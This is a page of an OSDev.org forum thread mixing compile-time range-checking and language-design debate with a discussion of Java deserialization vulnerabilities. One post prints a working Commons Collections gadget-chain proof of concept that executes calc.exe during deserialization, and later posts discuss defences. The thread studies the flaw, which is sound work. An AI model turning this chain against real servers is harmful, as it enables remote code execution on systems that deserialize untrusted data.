OSDev.org

The Place to Start for Operating System Developers
It is currently Mon Mar 01, 2021 1:23 am

All times are UTC - 6 hours




Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 6, 7, 8, 9, 10  Next
Author Message
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 11:41 am 
Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
Brendan wrote:
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)

_________________
[www.abubalay.com]


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 12:35 pm 
Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Rusky wrote:
Brendan wrote:
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)


For this code:

Code:
    value = 0;
    while( (c = buffer[i++]) != 0) {
        if( (c >= '0') && (c <= '9') ) {
            value = value * 16 + c - '0';
        } else if( (c >= 'A') && (c <= 'F') ) {
            value = value * 16 + c - 'A' + 10;
        } else {
            return -1;
        }
    }
    return value;


Are these branches normal flow control or are they run-time checks?

What if I wrote this:

Code:
unsigned long long factorial(unsigned char value) {
    return value * factorial(value-1);
}


And the compiler complained that "value - 1" may overflow (become negative); and I changed the code to this:

Code:
unsigned long long factorial(unsigned char value) {
    if(value <= 1) return 1;
    return value * factorial(value-1);
}


Did I add a run-time check or normal flow control?

If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software is managed. It's absurd.
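For comparison, the same factorial can be written in Java, where the programmer likewise chooses where the checks go: the base-case guard is ordinary flow control, while Math.multiplyExact is an overflow check the programmer explicitly opted into (the class name here is mine, purely for illustration):

```java
public class Factorial {
    // The base-case guard is ordinary flow control, just like the C version.
    // Math.multiplyExact is a run-time check the programmer chose to insert:
    // it throws ArithmeticException instead of silently wrapping on overflow.
    static long factorial(int value) {
        if (value <= 1) return 1;
        return Math.multiplyExact(value, factorial(value - 1));
    }
}
```

Note that 20! still fits in a long, while 21! triggers the explicit overflow check.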


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 12:46 pm 
Joined: Tue Jan 21, 2014 10:16 am
Posts: 56
Quote:
Did I add a run-time check or normal flow control?

If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software is managed. It's absurd.


Yeah, it's obvious that there are conditionals that belong to the given algorithm, and checks that only shield against programming errors like an index out of bounds.

The latter are auto-generated in e.g. Java or D, and I'd also count std::vector::at in C++.

Conflating those doesn't help the discussion. But of course, a less proficient programmer could degrade any statically checked system by always just doing something like:

Code:
array[x] // error cannot prove that x < array.length

// less proficient programmer changes this to
if(x >= array.length)
    throw IndexOutOfBounds()

array[x] // fine now


Cannot shield against stupid.
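The two kinds can be made concrete in Java, where the bounds check on a[i] is always generated by the JVM; the only choice is whether to lean on that generated check or to write your own guard as flow control (method names below are made up for the sketch):

```java
public class Bounds {
    // Leans on the check the JVM auto-generates for every a[i];
    // catching the exception just reuses that generated check.
    static int viaJvmCheck(int[] a, int i) {
        try {
            return a[i];
        } catch (ArrayIndexOutOfBoundsException e) {
            return -1;
        }
    }

    // The programmer's own guard, written as part of the algorithm's flow control.
    static int viaManualCheck(int[] a, int i) {
        if (i < 0 || i >= a.length) return -1;
        return a[i];
    }
}
```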


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 1:04 pm 
Joined: Fri Oct 27, 2006 9:42 am
Posts: 1725
Location: Athens, GA, USA
Brendan wrote:
For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.

The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....

If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.

OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on possible invalid values. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating between the compiler inserting runtime checks automatically and the compiler requiring the programmer to include manually inserted runtime checks.

This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:
Code:
(def Foo-Range
  (constrained-type Integer
    (cond ((<  _ -250) (set! _ -250) _)
          ((>= _ 750)  (raise-overflow-exception! _))
          (else _))))


(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:
Code:
(def Foo-Range
  (ranged-type Integer
               :underflow #saturate
               :overflow (raise-overflow-exception! _)))


or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.
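As a sketch of what such a defaulted ranged type amounts to, hand-written in Java (names are hypothetical; this spells out what the compiler or macros would generate for the Foo-Range above): underflow below -250 saturates, overflow at or above 750 raises:

```java
public class FooRange {
    static final int MIN = -250, MAX = 750;  // hypothetical declared range

    // Saturate on underflow, raise on overflow, pass through otherwise --
    // mirroring (:underflow #saturate :overflow raise) in the sketch above.
    static int clampOrThrow(int v) {
        if (v < MIN) return MIN;                                  // saturate
        if (v >= MAX) throw new ArithmeticException("overflow: " + v);
        return v;
    }
}
```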

Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to be addressed at least in the documentation and error reporting.

There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.

I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?

Schol-R-LEA wrote:
Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.


Brendan wrote:
The context only really affects what the compiler thinks the previous range of values in x could be.

I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.

OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or to replace the loop with non-conditional repetition (e.g., REP MOVS). Whether finding such potential optimizations (and knowing when they would make a difference) is feasible is not the point: the point is that context can affect how you compile a particular part of a program.

Brendan wrote:
Basically it comes down to a design choice. A compiler may:
  • guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
  • guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time

The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.


Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
μή εἶναι βασιλικήν ἀτραπόν ἐπί γεωμετρίαν
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 1:22 pm 
Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
Brendan wrote:
If you think these are run-time checks (and not normal flow control); then all software has run-time checks
This is precisely my point- they are (or should be) the same thing. Like I said, "it allows the programmer to control exactly where the runtime checks happen," and that includes folding them into other control flow that may already be necessary.

Brendan wrote:
and therefore all software is managed. It's absurd.
Yes, concluding that everything is "managed" because it has non-compiler-enforced runtime checks often folded into regular control flow does sound an awful lot like something embryo would say.

_________________
[www.abubalay.com]


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:06 pm 
Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
How does $1000 USD sound? Please read the next section carefully before agreeing.

Your insistence paid off. I finally downloaded the code from Git and managed to run it in a much simpler form (to understand it clearly).

Yes. It works. I was wrong.

Here is the code. None of the article author's classes are needed. But to compile it, the JDK is required rather than just a JRE, plus Commons Collections, of course. An exception is thrown after calc.exe runs, but that's not important for the problem.

Code:
      // Imports needed: java.io.*, java.lang.reflect.*, java.util.*, and from
      // Commons Collections 3.x: org.apache.commons.collections.Transformer,
      // .functors.{ConstantTransformer, InvokerTransformer, ChainedTransformer},
      // and .map.LazyMap.
      // The Transformer chain is equivalent to Runtime.getRuntime().exec("calc.exe"):
      Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class }, new String[]{"calc.exe"}),
            new ConstantTransformer(1) };
      Transformer transformerChain = new ChainedTransformer(transformers);
      // LazyMap runs the chain whenever a missing key is looked up;
      // AnnotationInvocationHandler performs such a lookup during deserialization.
      Map<?,?> lazyMap = LazyMap.decorate(new HashMap<Object,Object>(), transformerChain);
      Constructor<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
      c.setAccessible(true);
      InvocationHandler ih1=(InvocationHandler)c.newInstance(Override.class, lazyMap);
      Class<?>[] allIfaces = new Class[]{Map.class};
      Map<?,?> mapProxy = Map.class.cast(Proxy.newProxyInstance(Map.class.getClassLoader(), allIfaces , ih1));
      InvocationHandler ih=(InvocationHandler)c.newInstance(Override.class, mapProxy);

      ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("d:/temp/ser.bin"));
      oos.writeObject(ih);
      oos.close();
      
      ObjectInputStream ois=new ObjectInputStream(new FileInputStream("d:/temp/ser.bin"));
      Object after=ois.readObject();
      ois.close();


And there really is some danger in the way deserialization works. It instantiates classes and runs seemingly harmless code, but if a class on the classpath makes reflection-based method calls, then it is possible to run anything during deserialization just by defining some fields in the serialized payload. It's not easy to find such a reflection-based helper for the attacker, but the article's author managed to find one in Commons Collections. That means somebody else could find something similar elsewhere.

So, just stop using serialized objects from untrusted sources.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:32 pm 
Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
embryo2 wrote:
So, just stop using serialized objects from untrusted sources.
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?

_________________
[www.abubalay.com]


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:37 pm 
Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Schol-R-LEA wrote:
Brendan wrote:
For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.

The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....

If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.

OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on possible invalid values. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating between the compiler inserting runtime checks automatically and the compiler requiring the programmer to include manually inserted runtime checks.

This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:
Code:
(def Foo-Range (constrained-type Integer
                (cond ((<  _ -250) (set! _ -250) _)
                      ((>= _ 750) (raise-overflow-exception! _))
                      (else _))))


(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:
Code:
(def Foo-Range
    (ranged-type Integer
                 :underflow #saturate
                 :overflow (raise-overflow-exception! _)))


or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.


I don't just have ranged types, I only have ranged types.

For creating integers it's like "range 0 to 255 myInteger", but (for convenience) the compiler also lets you specify a range by the number of bits (e.g. "s7" is a synonym for "range -64 to 63", and "u12" is a synonym for "range 0 to 4095").

For creating floating point variables it's similar but different because there's both precision and range. The precision is specified in bits and the range is like it is for integers - e.g. "f24 range 0 to 1 myFloaty". It's also possible to set the range by specifying the exponent size in bits, so "f24e8" is equivalent to a single precision (32-bit) float.

In general this has nothing to do with how much space variables consume and programmers shouldn't know or care about storage. For example if you have an integer "range 100000000 to 100000255 foo" then the compiler can store it in 8-bits or anything else it feels like.

For structures, the compiler is free to do anything it wants. For example, if you have this:

Code:
struct {
    range 100000000 to 100000255 foo
    u32 bar
    range 1 to 7 dayOfWeek
    range 1 to 31 day
    range 1 to 12 month
}


Then the compiler might use 8 bits for "foo"; then decide to pack "dayOfWeek", "day" and "month" into a bitfield; and then (for alignment purposes) re-order the fields so you end up with this:

Code:
struct {
    u32 bar
    u16 dayOfWeek : 3
    u16 day : 5
    u16 month : 4
    u8 foo
}


Of course the language doesn't support bitfields, as there's no real reason to bother with them.
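The packing the compiler might choose for those three date fields can be written out by hand, e.g. in Java (helper names are made up): dayOfWeek gets 3 bits, day 5 bits, and month 4 bits of a single 16-bit word, matching the widths in the struct above:

```java
public class DatePack {
    // dayOfWeek: 3 bits, day: 5 bits, month: 4 bits -- 12 bits of one u16.
    static int pack(int dayOfWeek, int day, int month) {
        return (dayOfWeek & 0x7) | ((day & 0x1F) << 3) | ((month & 0xF) << 8);
    }

    static int dayOfWeek(int packed) { return packed & 0x7; }
    static int day(int packed)       { return (packed >> 3) & 0x1F; }
    static int month(int packed)     { return (packed >> 8) & 0xF; }
}
```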

For cases where the exact layout in memory matters (e.g. for file formats and messaging protocols in normal process, and for things like page tables in kernels and memory mapped IO in device drivers) there's "rigid structures". For these the compiler has to follow a set of strict rules - no padding for alignment (other than rounding to the nearest whole byte), no field re-ordering, everything little-endian (even on big-endian machines), no tricks to reduce sizes (that "range 100000000 to 100000255 foo" variable would be 32 bits), etc.

Schol-R-LEA wrote:
Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to be addressed at least in the documentation and error reporting.


No :)

A function's signature is a contract. If you write "range 1 to 9 myFunction(range -100 to 300 y)" then the compiler checks that the function is capable of handling all possible values of y from -100 to 300 correctly. If the function is called, the compiler only has to check that the caller complies with the contract (the caller provides a value from -100 to 300). This means that individual functions can be checked in isolation, and checked in any order (and checked in parallel, possibly by multiple computers on a LAN).

Also note that for local variables the overflow checking can work in reverse. Normally for assignments the compiler ensures that the left hand side variable can handle the range of results from the right hand expression and complains if it doesn't. However, if you say that a local variable has the "auto" type then the compiler initially assumes the variable's range is from 0 to 0, and instead of complaining if there's an overflow it just increases the variable's range.
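A minimal sketch of that range propagation in Java (class and method names are mine, not Brendan's): the range of "x + 1" is computed from the range of x, a normal assignment checks containment, and an "auto" variable widens its range instead of failing:

```java
public class RangeCheck {
    long min, max;                       // a variable's declared range
    RangeCheck(long min, long max) { this.min = min; this.max = max; }

    // Evaluate the result range of "x + k" from the range of x.
    static RangeCheck plus(RangeCheck x, long k) {
        return new RangeCheck(x.min + k, x.max + k);
    }

    // Normal assignment: a compile-time error if the result may not fit.
    boolean accepts(RangeCheck result) {
        return result.min >= min && result.max <= max;
    }

    // An "auto" local: widen the declared range instead of complaining.
    void widenTo(RangeCheck result) {
        min = Math.min(min, result.min);
        max = Math.max(max, result.max);
    }
}
```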

Schol-R-LEA wrote:
There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.

I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?


You'd have to choose a "max. size" type and the compiler will only ensure that all your code handles the range of the max. size type correctly. Anything beyond that (e.g. if you want to limit values to a sub-range at run-time, or only want to store prime numbers, or only odd numbers, or whatever else) is "domain logic" (your problem) and not "correctness" (compiler's problem).

Schol-R-LEA wrote:
Brendan wrote:
Schol-R-LEA wrote:
Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.


The context only really affects what the compiler thinks the previous range of values in x could be.

I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.

OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or to replace the loop with non-conditional repetition (e.g., REP MOVS). Whether finding such potential optimizations (and knowing when they would make a difference) is feasible is not the point: the point is that context can affect how you compile a particular part of a program.


Things like syntax checks, grammar/semantic checks, type checks, and overflow and precision checks happen first. Optimisations only happen after checks are done.

Schol-R-LEA wrote:
Brendan wrote:
Basically it comes down to a design choice. A compiler may:
  • guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
  • guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time

The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.


Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.


For this aspect of it, yes. ;)


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:59 pm 
Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Rusky wrote:
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods.

Why do you think untrusted communication is better than other methods?
Rusky wrote:
Or isn't that what managed languages are supposed to do for you?

More security? Yes. Can developers of managed environments introduce security-related bugs? Yes. But with the unmanaged approach, security is compromised even more. If a program runs unconstrained then there's no way to change anything. And it is still impossible to guarantee a program's safety before it reaches its users.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 4:46 am 
Joined: Wed Oct 18, 2006 3:45 am
Posts: 9289
Location: On the balcony, where I can actually keep 1½m distance
Rusky wrote:
embryo2 wrote:
So, just stop using serialized objects from untrusted sources.
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?

Requiring authentication only limits how far privileges can be escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.

I don't consider authentication a fix. After all, chances are there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.

_________________
"Certainly avoid yourself. He is a newbie and might not realize it. You'll hate his code deeply a few years down the road." - Sortie
[ My OS ] [ VDisk/SFS ]


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 9:19 am 
Joined: Fri Oct 27, 2006 9:42 am
Posts: 1725
Location: Athens, GA, USA
Combuster wrote:
Rusky wrote:
embryo2 wrote:
So, just stop using serialized objects from untrusted sources.
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?

Requiring authentication only limits how far privileges can be escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.

I don't consider authentication a fix. After all, chances is there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.

While I agree that it isn't a fix, some sort of authentication or vetting will probably have to be part of any 'solution' that comes up, at least in the immediate term, and it does at least raise the barrier to attack a small amount. Whether it raises it sufficiently to justify the added complexity, and how much said complexity itself changes the window of vulnerability, is something that would have to be determined as specific approaches get proposed and disposed. Security is a treatment, not a remedy.

What is really needed, though, are better mechanisms for continuous review of existing security resolutions, preferably one that is reflective enough that exploits of the review itself would be significantly difficult. Of course, you would need to change that procedure itself over time to make sure no new unforeseen exploits arise. Security is a process, etc.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
μή εἶναι βασιλικήν ἀτραπόν ἐπί γεωμετρίαν
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 11:10 am 
Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
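For reference, a class whitelist of exactly this kind later landed in the JDK itself as java.io.ObjectInputFilter (JEP 290, Java 9): a per-stream filter consulted before any class is resolved. A sketch, where the filter pattern is only an example, not a recommendation:

```java
import java.io.*;

public class SafeDeserialize {
    // Whitelist java.lang and java.util only; the trailing "!*" rejects
    // everything else, including the Commons Collections gadget classes.
    public static Object readWhitelisted(byte[] bytes)
            throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
        ois.setObjectInputFilter(
                ObjectInputFilter.Config.createFilter("java.lang.*;java.util.*;!*"));
        return ois.readObject();
    }
}
```

A rejected class aborts deserialization with InvalidClassException before any of its code runs.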

_________________
[www.abubalay.com]


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 11:27 am 
Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Rusky wrote:
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.

It's called validation. In the case of a password there's also some kind of validation involved. So, the trusted source is a source of validated data.

By the way, there are a lot of XML parsers used without serious validation. So, in any language it is possible to invoke something on the server side if the parser is eager to invoke something data-driven.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Mon Nov 16, 2015 7:41 am 
Joined: Wed Oct 18, 2006 3:45 am
Posts: 9289
Location: On the balcony, where I can actually keep 1½m distance
Rusky wrote:
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.

I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.

_________________
"Certainly avoid yourself. He is a newbie and might not realize it. You'll hate his code deeply a few years down the road." - Sortie
[ My OS ] [ VDisk/SFS ]


 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Mon Nov 16, 2015 9:57 am 
Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Combuster wrote:
I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.

It's not easy. The root object is not responsible for the flaw in the hack being discussed; the way it works is complex. It's actually the LazyMap class that connects fields with actions, and it is invoked during the very specific step of annotation deserialization. The annotation is not the root class, and the transformers from Commons Collections are not the guilty party on their own. It's the LazyMap.

Because of such complexity there's just no way around very thorough validation. In the case of XML, JSON, or even HTTP or RMI or whatever, there are also deserializers. What if some of them invoke something like LazyMap in the process? Validation lets us limit the incoming threat; otherwise we need to review all the parsing-related code in every language.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)





Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group